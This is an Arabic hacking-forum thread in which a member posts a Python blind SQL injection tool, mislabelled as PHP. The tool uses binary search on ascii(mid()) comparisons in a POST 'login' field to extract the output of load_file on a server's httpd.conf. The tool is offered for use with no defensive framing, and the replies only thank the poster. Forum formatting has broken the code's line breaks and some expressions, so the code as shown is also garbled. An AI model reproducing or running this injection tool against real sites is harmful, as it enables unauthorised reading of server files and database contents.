1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : STAY ALIVE | المشاهدات : 367 | الردود : 3
  1. STAY ALIVE

    STAY ALIVE Active DeveloPer

    الأنتساب:
    ‏22 أكتوبر 2012
    المشاركات:
    98
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    [​IMG]

    اداة تقوم باستغلال ثغرات البليند

    مميزات الاداة :

    تقوم بحصر القيمة

    مثل لمعرفة الحرف الاول من استعلام يلزمك 32-128 احتمال يعني تقريبا 100 ركوست للحصول

    على النتيجة الصحيحة


    لكن هذي الاداة تستعمل8 او 9 استعلامات فقط لجلب الحرف او الرمز

    [​IMG]


    الاداة

    كود PHP:
    #!/usr/bin/python
    from __future__ import print_function
    import urllib2
    import urllib
    header
    ="""
    [+] dichomatic Sql Header injection
    [+] Coded by Massacreur (TxDW)
    [+] Email Webservers@hotmail.fr
    [+] Sec4ever Team

    """

    # configuration :
    url_target="http://127.0.0.1/sql.php" # url
    marquery_negatif=None # or None type
    marquery_positif="txdw" # or None type
    command="""(select load_file("/etc/init.d/apache/httpd.conf"))""" # command sqli
    file_name="data.txt"

    def verification(r):
        global 
    marquery_negatif
        
    global marquery_positif
        
    if marquery_negatif and not marquery_negatif in r:
            return 
    True
        
    if marquery_positif and marquery_positif in r:
            return 
    True

    def url
    (w,types,order):
        global 
    command
        
    global url_target
        cmd
    ="""ascii(mid(%s,%s,1))%s%s"""%(command,order,types,str(w))
        
    post_datas = {"login" """ 1 rlike if (%s ,1,0x28)"""%(cmd)}
        
    headers={"massacreur":"sec4ever"}
        
    req urllib2.Request(url_targetpost_datas,headers)
        
    r=urllib2.urlopen(req).read()
        if 
    verification(r):
            return 
    True

    def dichotomic
    (order):
        if 
    not url(0,">",order):
            return 
    False
        start
    =32
        finich
    =127
        ascii
    =[for i in range(start,finich+1)]
        
    w=ascii[len(ascii)/2]
        while 
    True:
            if 
    len(ascii)==1:
                if 
    ascii[0]==32 and url(10,"=",order):
                    return 
    10
                
    else:
                    return 
    ascii[0]
            if 
    url(w,"<",order):
                
    start=start
                finich
    =w
            
    else:
                
    start=w
                finich
    =finich
            ascii
    =[for i in range(start,finich)]
            
    w=ascii[len(ascii)/2]
    print (
    header)

    order=1
    data
    =""
    while True:
        try:
            
    req_sql=dichotomic(order)
            if 
    req_sql:
                print (
    chr(req_sql),end='')
                
    data+=chr(req_sql)
                
    order+=1
            
    else:
                break
        
    except:
            print (
    "\r\n[+]Error => order num : %s \n"order)
            break
    print (
    "\r\n")
    open(file_name,'w').write(data)
    [​IMG]
     
  2. Mustafa Moshkela

    Mustafa Moshkela DeveloPer Plus

    الأنتساب:
    ‏6 نوفمبر 2014
    المشاركات:
    213
    الإعجابات المتلقاة:
    10
    نقاط الجائزة:
    18
    الوظيفة:
    طالب
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    PHP
    Facebook:
    YouTube:
    رد: آستغلال ثغرات البليند dichotomic sql injection

    عاشت ايدك
     
  3. Mr.BOY

    Mr.BOY Developer

    الأنتساب:
    ‏19 يناير 2013
    المشاركات:
    68
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    8
    الإقامة:
    الجنوب العربي
    نظام التشغيل:
    Linux
    اللغة البرمجية:
    Ruby
    رد: آستغلال ثغرات البليند dichotomic sql injection

    سلمت يداك اخي
     
  4. Sуя!ησ

    Sуя!ησ Developer

    الأنتساب:
    ‏21 نوفمبر 2012
    المشاركات:
    70
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    Sуя!σ
    نظام التشغيل:
    windows 7
    رد: آستغلال ثغرات البليند dichotomic sql injection

    الله يحفظك اخي الغالي ،
     

مشاركة هذه الصفحة